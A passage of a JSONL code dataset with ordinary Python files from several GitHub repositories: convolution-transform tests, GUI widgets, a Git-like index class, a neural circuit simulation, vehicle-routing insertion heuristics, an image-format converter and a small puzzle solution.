n)\n return rwt\n\n\ndef ch_trans_filter(w, inds):\n w_gpu = cuda.to_gpu(w)\n inds_gpu = 
cuda.to_gpu(inds)\n\n wv = Variable(w_gpu)\n rwv = TransformGFilter(inds_gpu)(wv)\n\n return cuda.to_cpu(rwv.data)\n\n\n@pytest.mark.parametrize(\"make_indices,nti\", [\n (make_c4_z2_indices, 1),\n (make_d4_z2_indices, 1),\n (make_c6_z2_indices, 1),\n (make_d6_z2_indices, 1),\n (make_c4_p4_indices, 4),\n (make_d4_p4m_indices, 8),\n (make_c6_p6_indices, 6),\n (make_d6_p6m_indices, 12)\n])\n@pytest.mark.parametrize(\"transform\", [tf_trans_kernel_nhwc]) # , tf_trans_kernel_nchw])\n@pytest.mark.parametrize(\"ksize\", [3, 7])\ndef test_transforms(make_indices, nti, transform, ksize):\n inds = make_indices(ksize=ksize)\n\n no, ni = np.random.randint(1, 10, size=2)\n w = np.random.randn(no, ni, nti, ksize, ksize)\n\n rt = transform(w, inds)\n rc = ch_trans_filter(w, inds)\n\n np.testing.assert_array_equal(rt, rc)\n","repo_name":"ehoogeboom/hexaconv","sub_path":"groupy/gconv/gconv_tensorflow/test_transform_kernel.py","file_name":"test_transform_kernel.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"40"} +{"seq_id":"35008255343","text":"import wx\nimport wx.lib.masked as masked\n\n########################################################################\nclass MyPanel(wx.Panel):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, parent):\n \"\"\"Constructor\"\"\"\n wx.Panel.__init__(self, parent)\n\n self.mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n text1 = wx.StaticText( self, -1, \"12-hour format:\", size=(150,-1))\n self.time12 = masked.TimeCtrl( self, -1, name=\"12 hour control\" )\n h = self.time12.GetSize().height\n spin1 = wx.SpinButton( self, -1, wx.DefaultPosition, (-1,h), wx.SP_VERTICAL )\n self.time12.BindSpinButton( spin1 )\n self.addWidgets([text1, self.time12, spin1])\n\n text2 = wx.StaticText( self, -1, \"24-hour format:\")\n spin2 = wx.SpinButton( self, -1, wx.DefaultPosition, (-1,h), wx.SP_VERTICAL )\n self.time24 = masked.TimeCtrl(\n self, -1, name=\"24 hour control\", fmt24hr=True,\n spinButton = spin2\n )\n self.addWidgets([text2, self.time24, spin2])\n\n text3 = wx.StaticText( self, -1, \"No seconds\\nor spin button:\")\n self.spinless_ctrl = masked.TimeCtrl(\n self, -1, name=\"spinless control\",\n display_seconds = False\n )\n self.addWidgets([text3, self.spinless_ctrl])\n\n self.SetSizer(self.mainSizer)\n\n #----------------------------------------------------------------------\n def addWidgets(self, widgets):\n \"\"\"\"\"\"\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n for widget in widgets:\n if isinstance(widget, wx.StaticText):\n sizer.Add(widget, 0, wx.ALL|wx.CENTER, 5),\n else:\n sizer.Add(widget, 0, wx.ALL, 5)\n self.mainSizer.Add(sizer)\n\n########################################################################\nclass MyFrame(wx.Frame):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Frame.__init__(self, None, title=\"Spinner Demo\")\n panel = MyPanel(self)\n self.Show()\n\nif __name__ == \"__main__\": \n app = wx.App(False)\n f = MyFrame()\n app.MainLoop()","repo_name":"jamespsw123/CAL-GUI-NEW","sub_path":"practice/timepicker.py","file_name":"timepicker.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74916112761","text":"from .lockfile\t\t\t\timport Lockfile\nfrom index.entry \t\t\timport Entry\nimport common.util\nfrom 
collections\t\t\timport namedtuple\nimport struct\nimport hashlib\n\nclass Index:\n\tHEADER_SIZE \t= 12\n\tHEADER_FORMAT\t= '>4s2i'\n\tSIGNATURE\t\t\t= b'DIRC'\n\tVERSION\t\t\t\t= 2\n\t\n\tENTRY_FORMAT\t\t= '>10I20sH{}sx'\n\tENTRY_BLOCK\t\t\t= 8\n\tENTRY_MIN_SIZE \t= 64\n\t \n\tdef __init__(self, pathname):\n\t\tself.pathname = pathname\n\t\tself.lockfile = Lockfile(pathname, binary=True)\n\t\tself.clear()\n\t\t\n\tdef clear(self):\n\t\tself.entries = dict()\n\t\tself.parents = dict()\n\t\tself.changed = False\n\t\t\n\tdef open_index_file(self):\n\t\ttry:\n\t\t\treturn open(self.pathname, 'r+b')\n\t\texcept FileNotFoundError:\n\t\t\treturn None\n\t\t\t\n\tdef read_header(reader):\n\t\tdata = reader.read(Index.HEADER_SIZE)\n\t\tsignature, version, count = struct.unpack(Index.HEADER_FORMAT, data)\n\t\t\n\t\tif not signature == Index.SIGNATURE:\n\t\t\traise Invalid(f'Signature: expected {Index.SIGNATURE} but found {signature}')\n\t\tif not version == Index.VERSION:\n\t\t\traise Invalid(f'Version: expected {Index.VERSION} but found {version}')\n\t\t\t\n\t\treturn count\n\t\t\n\tdef read_entries(self, reader, count):\n\t\tfor i in list(range(count)):\n\t\t\tentry_bytes = reader.read(Index.ENTRY_MIN_SIZE)\n\t\t\t\n\t\t\twhile not entry_bytes[-1:] == b'\\x00':\n\t\t\t\tentry_bytes += reader.read(Index.ENTRY_BLOCK)\n\t\t\t\t\n\t\t\tentry = Entry.parse(entry_bytes)\n\t\t\tself.store_entry(entry)\n\t\t\t\t\n\tdef store_entry(self, entry):\t\n\t\tself.entries[entry.key()] = entry\n\t\t\n\t\tfor dir in entry.parent_directories():\n\t\t\tif not dir in self.parents:\n\t\t\t\tself.parents[dir] = set()\n\t\t\t\t\n\t\t\tself.parents[dir].add(entry.key())\n\t\t\n\tdef add(self, pathname, oid, stat):\n\t\tentry = Entry(pathname, oid, stat)\n\t\tself.discard_conflicts(entry)\n\t\tself.store_entry(entry)\n\t\tself.changed = True\n\t\t\n\tdef discard_conflicts(self, entry):\n\t\tfor parent in entry.parent_directories():\n\t\t\tself.remove_entry(parent)\n\t\tself.remove_children(entry.key())\n\t\t\t\t\n\tdef remove_children(self, path):\n\t\tif path in self.parents:\n\t\t\tchildren = self.parents[path].copy()\n\t\t\tfor child in children:\n\t\t\t\tself.remove_entry(child)\n\t\n\tdef remove_entry(self, pathname):\n\t\tif pathname in self.entries:\n\t\t\tentry = self.entries[pathname]\n\t\t\tdel self.entries[entry.key()]\n\t\t\t\n\t\t\tfor dir in entry.parent_directories():\n\t\t\t\tself.parents[dir].discard(entry.key())\n\t\t\t\tif len(self.parents[dir]) == 0:\n\t\t\t\t\tdel self.parents[dir]\n\t\n\tdef each_entry(self, function):\n\t\tif function is None:\n\t\t\tsorted_items = sorted(self.entries.items(), key = lambda x: x[0])\n\t\t\tresult = map(lambda x: x[1], sorted_items)\n\t\telse:\n\t\t\tresult = map(lambda x: function(self.entries[x].asBytes()), sorted(self.entries))\n\t\t\n\t\treturn list(result)\n\t\t\t\t\n\tdef write_updates(self):\n\t\tif not self.changed:\n\t\t\treturn self.lockfile.rollback()\n\t\t\n\t\twriter = Checksum(self.lockfile)\n\t\t\n\t\theader = struct.pack(Index.HEADER_FORMAT, Index.SIGNATURE, 2, len(self.entries))\n\t\t\t\t\t\n\t\twriter.write(header)\n\t\tself.each_entry(writer.write)\n\t\t\n\t\twriter.write_checksum()\n\t\tself.lockfile.commit()\n\t\tself.changed = False\n\t\t\n\tdef load_for_update(self):\n\t\tself.lockfile.hold_for_update()\n\t\tself.load()\n\t\t\t\n\tdef load(self):\n\t\tself.clear()\n\t\ttry:\n\t\t\twith self.open_index_file() as file:\n\t\t\t\tif file:\n\t\t\t\t\treader = Checksum(file)\n\t\t\t\t\tcount = 
Index.read_header(reader)\n\t\t\t\t\tself.read_entries(reader, count)\n\t\t\t\t\treader.verify_checksum()\n\t\texcept AttributeError:\n\t\t\tpass\t#OK if index file does not exist\n\t\t\t\n\tdef release_lock(self):\n\t\tself.lockfile.rollback()\n\t\t\n\t\t\nclass Checksum:\n\tCHECKSUM_SIZE = 20\n\t\n\tdef __init__(self, file):\n\t\tself.file = file\n\t\tself.digest = hashlib.sha1()\n\t\n\tdef read(self, size):\n\t\tdata = self.file.read(size)\n\t\t\n\t\tif len(data) < size:\n\t\t\traise EndOfFile('Unexpected end-of-file while reading index')\n\t\t\n\t\tself.digest.update(data)\n\t\treturn data\n\t\n\tdef verify_checksum(self):\n\t\tsum = self.file.read(Checksum.CHECKSUM_SIZE)\n\t\tif not sum == self.digest.digest():\n\t\t\traise Invalid('Checksum does not match value stored on disk')\n\t\t\t\n\tdef write(self, bytes):\n\t\tself.file.write(bytes)\n\t\tself.digest.update(bytes)\n\t\t\n\tdef write_checksum(self):\n\t\thex_bytes = bytes.fromhex(self.digest.hexdigest())\n\t\tself.file.write(hex_bytes)\n\t\n\nclass EndOfFile(Exception):\n\tpass\n\t\nclass Invalid(Exception):\n\tpass\n\t\t\n\t\n","repo_name":"baumhoto/pit","sub_path":"pit/core/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11604835776","text":"from brian2 import *\nfrom model_larva import Model\nimport numpy as np\nfrom AttrDict import AttrDict\nfrom stimulus import gamma\nfrom joblib import Parallel, delayed\nfrom elephant.spike_train_generation import homogeneous_gamma_process\nfrom quantities import Hz as qHz\nfrom quantities import ms as qms\n\n\nsafe = True\nsave_path = \"path\"\n\n\n\n\nParameters = dict(\n\n # sparseness mechanisms\n lateral_inhibition_enabled=1, # 0 or 1\n APL_inhibition= 0, # 0 or 1\n KC_SFA=0.05* nS, # conductance adaptation\n ORN_SFA= 0.1 * nS, # conductance adaptation\n\n # Neuron Parameters\n C=100 * pF, # capacitance \n CMBON = 100*pF, # capacitance MBON \n CKC=30 * pF, # capacitance KC\n CPN=30 * pF, # capacitance PN\n CLN=30 *pF,# capacitance LN\n CAPL=200 * pF, # capacitance APL\n \n gL=5 * nS, # leak conductance \n gLKC=0.5 * nS, # leak conductance KC\n gLPN=2.5 * nS, # leak conductance PN\n EL=-60 * mV, # leak potential\n ELPN=-59 * mV, # leak potential PN\n ELLN=-59 * mV, # leak potential LN\n ELKC=-55 * mV, # leak potential KC\n \n VT=-35 * mV, # spike threshold \n VTPN=-30 * mV, # spike threshold PN\n VTLN=-30 * mV, # spike threshold LN\n VTKC=-35 * mV, # spike threshold KC\n VTAPL=-30 * mV, # spike threshold APL\n Vr=-60 * mV, # resting potential\n VrPN=-59 * mV, # resting potential PN\n VrLN=-59 * mV, # resting potential LN\n VrKC=-55 * mV, # resting potential KC\n VrAPL=-60 * mV, # resting potential APL\n\n tau_ref=2 * ms, # refractory time \n delay_KCAPL=0 * ms, # synaptic delay\n delay_APLKC=0 * ms,\n \n\n # Dimensions\n N_glo=21,\n ORNperGlo=1,\n N_KC=72,\n \n\n # Synaptic Parameters\n Ee=0 * mV, # excitatory synaptic potential\n Ei=-75 * mV, # inhibitory synaptic potential\n tau_syn_e=5 * ms, # excitatory synaptic time constant\n tau_syn_i=10 * ms, # inhibitory synaptic time constant\n\n # # weights \n wORNinputORN=3 * nS, wORNPN=30 * nS, wORNLN=9 * nS,\n wLNPN=2 * nS, wPNKC=1 * nS, wKCAPL=50 * nS, wAPLKC=100 * nS,\n\n # Adptation current Parameters\n tau_Ia = 1000*ms, \n EIa = -90*mV, \n\n # simulation\n dt = 0.1*ms)\n\n\n\n\n\n\ndef experiment(Parameters,filename):\n\n # set up model architecture\n NG,c = Model(Parameters)\n\n # create input 
stimulus (odor)\n odor_pattern = gamma()\n\n\n spike_times = []\n spike_index = []\n\n for neuron, value in enumerate(odor_pattern):\n spikes = homogeneous_gamma_process(10.0, (250* 10.0) * qHz, 0 * qms, 6000 * qms,as_array=True) # spontaneous activity\n for elem in spikes:\n spike_times.append(elem)\n spike_index.append(neuron)\n spikes = homogeneous_gamma_process(10.0, (value * 10.0) * qHz, 2000 * qms, 4000 * qms,as_array=True) #value\n for elem in spikes:\n spike_times.append(elem)\n spike_index.append(neuron)\n\n # input to SpikeGeneratorGroup is cleaned up to remove multiple spikes of one neuron during a dt\n spike_index = np.array(spike_index)\n spike_times = np.array(spike_times)\n spike_times = np.around(spike_times,decimals=1) \n\n\n temp_index = []\n temp_times = []\n for i, elem in enumerate(np.unique(spike_index)):\n spike_times_temp = spike_times[spike_index == elem]\n clean_spike_times = np.unique(spike_times_temp, return_index=True)[0]\n temp_times.extend(clean_spike_times)\n [temp_index.append(elem) for x in clean_spike_times]\n\n spike_times = temp_times\n spike_index = temp_index\n\n # input activation of ORNs\n NG['ORNinput'] = SpikeGeneratorGroup(Parameters['N_glo'], spike_index, spike_times * ms)\n input = SpikeMonitor(NG['ORNinput'])\n\n # ORNinput- ORN synapse\n\n c['ORNinputORN'] = Synapses(NG['ORNinput'], NG['ORN'], 'w : siemens', on_pre='g_e+=w')\n for i in np.arange(Parameters.get('N_glo')):\n c['ORNinputORN'].connect(i=list(range(i * Parameters.get('ORNperGlo'), (i + 1) * Parameters.get('ORNperGlo'))), j=i)\n c['ORNinputORN'].w = Parameters.get('wORNinputORN')\n\n\n\n # monitors\n\n spikemonitors = dict()\n\n spikemonitors['spikeORN'] = SpikeMonitor(NG['ORN'])\n spikemonitors['spikePN'] = SpikeMonitor(NG['PN'])\n spikemonitors['spikeLN'] = SpikeMonitor(NG['LN'])\n spikemonitors['spikeKC'] = SpikeMonitor(NG['KC'])\n spikemonitors['spikeAPL'] = SpikeMonitor(NG['APL'])\n\n\n\n\n # setup network\n\n net = Network(NG.values(),c.values())\n\n net.add(spikemonitors)\n\n\n # Running the simulation\n ParaWithLocals = dict()\n ParaWithLocals.update(Parameters)\n ParaWithLocals.update(locals())\n\n net.run(6000 * ms, namespace=ParaWithLocals)\n\n if safe:\n\n\n spikemons = dict()\n\n spikemons['spikeORN'] = AttrDict({'i': spikemonitors['spikeORN'].i[:],\n 't': spikemonitors['spikeORN'].t[:]})\n spikemons['spikePN'] = AttrDict({'i': spikemonitors['spikePN'].i[:],\n 't': spikemonitors['spikePN'].t[:]})\n spikemons['spikeLN'] = AttrDict({'i': spikemonitors['spikeLN'].i[:],\n 't': spikemonitors['spikeLN'].t[:]})\n spikemons['spikeKC'] = AttrDict({'i': spikemonitors['spikeKC'].i[:],\n 't': spikemonitors['spikeKC'].t[:]})\n spikemons['spikeAPL'] = AttrDict({'i': spikemonitors['spikeAPL'].i[:],\n 't': spikemonitors['spikeAPL'].t[:]})\n\n spikemons = AttrDict(spikemons)\n\n\n data = {'spikemons': spikemons,\n 'Parameters': Parameters,\n }\n\n\n\n d = AttrDict(data)\n\n np.savez(os.path.join(save_path,filename), data=d)\n\n\n \n\n\n##### data collection #####\n\nsample = np.arange(1)\n\nParallel(n_jobs=len(sample))(delayed(experiment)(Parameters=Parameters, filename=f\"Larva_{animal:02}\")for animal in sample)\n\n\n\n\n\n\n\n\n\n","repo_name":"nawrotlab/DrosophilaOlfactorySparseCoding","sub_path":"experiment_larva.py","file_name":"experiment_larva.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71700048440","text":"import tkinter\n\ndef TextFilter(_event=None):\n \"\"\"Filter 
function for text input\"\"\"\n    return None\n\nclass NumericFilter(object):\n    \"\"\"\n    Class for numeric filtering\n\n    This filter can only limit new input to the field, not validate the\n    ending expression.\n    \"\"\"\n\n    DIGITS = \"0123456789\"\n    # Some control characters need special handling\n    CONTROL = [\"BackSpace\"]\n\n    def __init__(self, signed=True, fractional=False):\n        self.allow_always = self.DIGITS\n        self.control_chars = self.DIGITS\n        self.allow_once = \"\"\n        if signed:\n            self.allow_once += \"-\"\n        if fractional:\n            self.allow_once += \".\"\n        self.text_var = None\n\n    def __eq__(self, other):\n        if not isinstance(other, self.__class__):\n            return False\n        return self.__dict__ == other.__dict__\n\n    def __ne__(self, other):\n        return not self.__eq__(other)\n\n    def __call__(self, event=None):\n        if event.char in self.DIGITS:\n            return None\n        if event.keysym in self.CONTROL:\n            return None\n        if not event.char:\n            print(\"Error: Uncaught control symbol {}\".format(event.keysym))\n            return \"break\"\n        if self.text_var:\n            # Look for an instance in the text already\n            text = self.text_var.get()\n            if not any(filter_char in text for filter_char in self.allow_once):\n                # Not present, allow\n                return None\n        elif event.char in self.allow_once:\n            # Treat it as always allowed when no text var link\n            return None\n        return \"break\"\n\nclass Text(tkinter.Entry):\n    \"\"\"Filtering text control\"\"\"\n\n    def __init__(self, master, **kwargs):\n        tkinter.Entry.__init__(self, master=master, **kwargs)\n        self.filter_fn = TextFilter\n        self.bind(\"<Key>\", self.filter_fn)\n        self.text_var = kwargs.get(\"textvariable\", None)\n\n    def set_filter(self, filter_fn):\n        \"\"\"Set the function which will do the filtering for this control\"\"\"\n\n        # pylint: disable=W0143\n        if self.filter_fn == filter_fn:\n            return\n\n        if isinstance(filter_fn, NumericFilter):\n            # Link the text variable to the filter\n            filter_fn.text_var = self.text_var\n\n        def _filter_cb(event=None):\n            return filter_fn(event)\n\n        # Remember the active filter so repeated set_filter calls stay no-ops\n        self.filter_fn = filter_fn\n        self.bind(\"<Key>\", _filter_cb)\n","repo_name":"dpkristensen/globifest","sub_path":"Globiconfig/FilterText.py","file_name":"FilterText.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"2101899762","text":"from utils import *\nimport numpy as np\nimport random\n\ndef regret_value(costs, x_ik, q):\n    \"\"\"\n    Computes the regret value for each node in a solution.\n\n    Parameters:\n    costs (np.array): matrix of costs for each node in each route\n\n    x_ik (np.array): matrix of indices of the q lowest costs for each node\n\n    q (int): number of lowest costs to consider\n\n    Outputs:\n    regrets (np.array): vector of regret values for each node\n    \"\"\"\n\n    least_cost = costs[:, 0][:, np.newaxis]\n    regrets = np.sum(costs[:, 1:q+1] - least_cost, axis=1)[:, np.newaxis]\n    return regrets\n
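\n# Illustrative example (hypothetical numbers, not from the surrounding code):\n# with per-node costs already sorted ascending, costs = np.array([[1, 4, 7], [2, 3, 3]])\n# and q = 2, the 2-regret values are (4-1)+(7-1) = 9 and (3-2)+(3-2) = 2,\n# so a regret heuristic would insert the first node before the second.\n\ndef length_checker(routes, nodes, dists, max_length, args):\n    \"\"\"\n    Checks if a list of nodes can be inserted into a list of routes without\n    violating the maximum route length constraint.\n\n    Parameters:\n    routes (list): list of routes\n\n    nodes (list): list of nodes to insert\n\n    dists (np.array): distance matrix\n\n    max_length (float): maximum route length\n\n    args (argsparse.NameSpace): command line arguments\n\n    Outputs:\n    lengths (np.array): matrix of lengths of routes with nodes inserted\n\n    lengths_bool (np.array): matrix of booleans indicating whether a route is too long\n\n    length_info (list): list of tuples containing information about the insertion\n    of each 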
node into each route\n \"\"\"\n\n lengths = np.zeros((len(nodes), len(routes)))\n length_info = []\n\n for i, node in enumerate(nodes):\n info = []\n for j, route in enumerate(routes):\n obj, _, route = add_node_to_route(node, route, dists)\n lengths[i, j] = obj\n info.append((obj, i, j, route))\n length_info.append(info)\n lengths_bool = np.where(lengths <= max_length, 1, 0)\n return lengths, lengths_bool, length_info\n\ndef k_regret(old_solution, nodes_to_insert, dists, instance_length_info, regret_num, args):\n \"\"\"\n Applies the k-regret insertion heuristic to a destroyed solution using\n the new nodes from the set covering heuristic.\n\n Parameters:\n old_solution (list): destroyed solution\n\n nodes_to_insert (list): set of nodes to insert\n\n dists (np.array): distance matrix\n\n instance_length_info (tuple): information about the route constraints\n\n regret_num (int): regret value to be applied\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n solution (list): new solution\n \"\"\"\n\n q = regret_num\n length_type, max_length = instance_length_info\n solution = old_solution.copy()\n too_long = []\n check = False\n while nodes_to_insert:\n if length_type == 'vertices':\n route_lengths = np.array([len(r) for r in solution])\n route_too_long = np.where(route_lengths + 1 > max_length)[0]\n if len(route_too_long):\n route_too_long = list(route_too_long)\n for idx in sorted(route_too_long, reverse=True):\n too_long.append(solution[idx])\n del solution[idx]\n else:\n lengths, lengths_bool, length_info = length_checker(solution, nodes_to_insert,\n dists, max_length, args)\n\n routes_too_long_dists = np.sum(lengths_bool, axis=1)\n permissable_sum = np.sum(routes_too_long_dists)\n check = False\n\n if permissable_sum == 0:\n solution.append([])\n\n elif any(routes_too_long_dists > len(solution) - q + 1): #or permissable_sum != 0:\n non_zeros = np.where(routes_too_long_dists > 0)[0]\n lowest = non_zeros[routes_too_long_dists[non_zeros].argmin()]\n\n changes = min(length_info[lowest], key=lambda x: x[0])\n\n _, placed_node_index, changed_route_index, new_route = changes\n solution[changed_route_index] = new_route\n del nodes_to_insert[placed_node_index]\n continue\n\n else:\n x = {}\n info = []\n costs = np.array([])\n nodes_cost = {}\n nodes_info = {}\n for i, k in np.argwhere(lengths_bool == 1):\n obj, _, route = add_node_to_route(nodes_to_insert[i],\n solution[k], dists)\n if i not in nodes_cost:\n nodes_cost[i] = [obj]\n nodes_info[i] = [[obj, i, k, route]]\n\n else:\n nodes_cost[i] = nodes_cost[i] + [obj]\n nodes_info[i] = nodes_info[i] + [[obj, i, k, route]]\n if len(nodes_cost[i]) < q:\n pass\n else:\n x[i] = np.argsort(np.array(nodes_cost[i]))[:q]\n\n for i in nodes_cost:\n nodes_cost[i] = np.sort(np.array(nodes_cost[i]))\n\n regrets = {}\n for i in nodes_cost:\n regrets[i] = np.sum(nodes_cost[i][1:q+1] - nodes_cost[i][0])\n\n max_regret = max(regrets, key=regrets.get)\n\n changes = min(nodes_info[max_regret], key=lambda x: x[0])\n\n _, placed_node_index, changed_route_index, new_route = changes\n solution[changed_route_index] = new_route\n del nodes_to_insert[placed_node_index]\n continue\n\n\n\n if len(nodes_to_insert) and solution == []:\n solution.append([])\n\n x = np.zeros((len(nodes_to_insert), q))\n total_info = []\n total_costs = np.zeros((len(nodes_to_insert), len(solution)))\n\n for i, node in enumerate(nodes_to_insert):\n info = []\n i_costs = np.array([])\n for k, route in enumerate(solution):\n obj, _, route = add_node_to_route(node, route, dists)\n 
i_costs = np.append(i_costs, np.array([obj]))\n info.append((obj, i, k, route))\n if len(i_costs) < q:\n pass\n else:\n x[i] = np.argsort(i_costs)[:q]\n total_costs[i] = i_costs\n total_info.append(info)\n sorted_costs = np.sort(total_costs)\n max_regrets = np.argmax(regret_value(sorted_costs, x, q))\n\n\n changes = min(total_info[max_regrets], key=lambda x: x[0])\n\n _, placed_node_index, changed_route_index, new_route = changes\n solution[changed_route_index] = new_route\n del nodes_to_insert[placed_node_index]\n\n if len(too_long):\n solution = solution + too_long\n\n return solution\n\ndef random_insertion(old_solution, nodes_to_insert, dists, length_info,\n regret_num, args):\n \"\"\"\n Applies the random insertion heuristic to a destroyed solution using\n the new nodes from the set covering heuristic.\n\n Parameters:\n old_solution (list): destroyed solution\n\n nodes_to_insert (list): set of nodes to insert\n\n dists (np.array): distance matrix\n\n instance_length_info (tuple): information about the route constraints\n\n regret_num (int): regret value to be applied\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n solution (list): new solution\n \"\"\"\n\n length_type, max_length = length_info\n solution = old_solution.copy()\n\n\n for node in nodes_to_insert:\n if length_type == 'vertices':\n candidates = [route for route in solution if len(route) < max_length]\n else:\n _, candidate_matrix, _ = length_checker(solution, nodes_to_insert, dists, max_length, args)\n permissable = np.where(np.all(candidate_matrix, axis=0))[0]\n\n if permissable.size == 0:\n candidates = False\n else:\n candidates = [solution[i] for i in permissable]\n\n if candidates:\n route = random.choice(candidates)\n else:\n route = [node]\n solution.append(route)\n continue\n\n place_in_route = random.randint(0, len(route))\n route.insert(place_in_route, node)\n\n return solution\n\ndef greedy_insertion(old_solution, nodes_to_insert, dists, length_info,\n regret_num, args):\n \"\"\"\n Applies the greedy insertion heuristic to a destroyed solution using\n the new nodes from the set covering heuristic.\n\n Parameters:\n old_solution (list): destroyed solution\n\n nodes_to_insert (list): set of nodes to insert\n\n dists (np.array): distance matrix\n\n instance_length_info (tuple): information about the route constraints\n\n regret_num (int): regret value to be applied\n\n args (argsparse.NameSpace): command line arguments\n\n Outputs:\n solution (list): new solution\n \"\"\"\n\n length_type, max_length = length_info\n solution = old_solution.copy()\n route_too_long = [False if len(r) < max_length else True for r in solution]\n\n while nodes_to_insert:\n c = np.zeros((len(nodes_to_insert), len(solution)))\n info = [[] for _ in range(len(nodes_to_insert))]\n for i, node in enumerate(nodes_to_insert):\n for k, route in enumerate(solution):\n if length_type == 'vertices':\n if len(route) >= max_length:\n obj, place_in_route = np.inf, None\n route_too_long[k] = True\n else:\n place = add_node_to_route(node, route, dists)\n obj, place_in_route, route = place\n else:\n obj, place_in_route, route = add_node_to_route(node, route, dists)\n if obj >= max_length:\n obj, place_in_route = np.inf, None\n route_too_long[k] = True\n\n info[i].append((place_in_route, route))\n c[i, k] = obj\n\n if all(route_too_long) and nodes_to_insert != []:\n route_too_long.append(False)\n solution.append([nodes_to_insert.pop(0)])\n continue\n\n\n if all(flatten(np.isinf(c))):\n return solution, nodes_to_insert\n n, r = 
np.unravel_index(c.argmin(), c.shape)\n        solution[r] = info[n][r][1]\n        nodes_to_insert.pop(n)\n    return solution\n\ndef add_node_to_route(node, route, dists):\n    \"\"\"\n    Adds a node to a route in its best place.\n\n    Parameters:\n    node (int): node to insert\n\n    route (list): route to insert node into\n\n    dists (np.array): distance matrix\n\n    Outputs:\n    best_place (tuple): tuple containing the best place to insert the node and the\n    route with the node inserted\n    \"\"\"\n\n    positions = len(route)+1\n    objectives = []\n\n    for i in range(positions):\n        cur_route_nodes = route[:i] + [node] + route[i:]\n        cur_route_edges = route_to_edges([0] + cur_route_nodes + [0])\n        objectives.append((objective(cur_route_edges,\n                                     dists, route=True), i, cur_route_nodes))\n\n    return min(objectives, key=lambda x:x[0])\n","repo_name":"jenstrolle/masters-thesis-code","sub_path":"mvctpy/repair_heuristics.py","file_name":"repair_heuristics.py","file_ext":"py","file_size_in_byte":11170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"24463605983","text":"#!/usr/bin/env python3\n'''\nConvert Ilastik project files (ilp) to Tiff files.\n\nUsage:\n    convert_ilp_to_tif.py <ilp_path> [<image_path>]\n\n'''\nfrom docopt import docopt\n\nimport re\nimport os\nimport sys\n\nimport lib\n\nimport numpy as np\nimport skimage.io\n\ndef main(ilp_filepath, image_path):\n    output_path = ilp_filepath+'-tiffs'\n    try:\n        os.mkdir(output_path)\n    except:\n        pass\n\n    print('Writing output to {}...'.format(output_path))\n    for path, (img, labels, _) in lib.read_project(ilp_filepath, image_path=image_path, prediction=False):\n        fname = lib.basename(path)\n\n        skimage.io.imsave(os.path.join(output_path, fname+'-img.tif'), img)\n        skimage.io.imsave(os.path.join(output_path, fname+'-lbl.tif'), labels)\n\n\nif __name__ == '__main__':\n    args = docopt(__doc__, version='convert_ilp_to_tif 0.1')\n    ilp_path = args['<ilp_path>']\n    image_path = args['<image_path>']\n
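\n    # Hypothetical invocation (illustration only): running\n    #   ./convert_ilp_to_tif.py project.ilp /data/images/\n    # makes docopt return {'<ilp_path>': 'project.ilp', '<image_path>': '/data/images/'};\n    # when the optional argument is omitted, '<image_path>' defaults to None.\n\n    try:\n        main(ilp_path, image_path)\n    except FileNotFoundError as e:\n        print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n        print('!!! 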
Maybe you can fix this error specifying the path to the images using the <image_path> option !!!')\n        print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n        raise e\n\n","repo_name":"yapic/pyilastik","sub_path":"pyilastik/convert_ilp_to_tif.py","file_name":"convert_ilp_to_tif.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"32105976752","text":"import sys\ninput = sys.stdin.readline\n\ndef sol(l,w,h,cube):\n    if not cube or min(l,w,h)<=0:\n        return\n    global cnt\n    length = 2**cube[-1][0]\n    if length <= min(l,w,h):\n        cube[-1][1]-=1\n        cnt+=1\n        if cube[-1][1]==0:\n            cube.pop()\n        sol(l,w,h-length,cube)\n        sol(l,w-length,h,cube)\n        sol(l-length,w,h,cube)\n    else:\n        cube.pop()\n        sol(l,w,h,cube)\n\nl,w,h = map(int,input().split())\nn = int(input())\ncube=[]\ncnt =0\nfor i in range(n):\n    a,b=map(int,input().split())\n    cube.append([a,b])\n\nsol(l,w,h,sorted(cube))\nprint(cnt)\n\n\n\n\n\n\n","repo_name":"sue06004/py_code","sub_path":"분할정복/1493.py","file_name":"1493.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
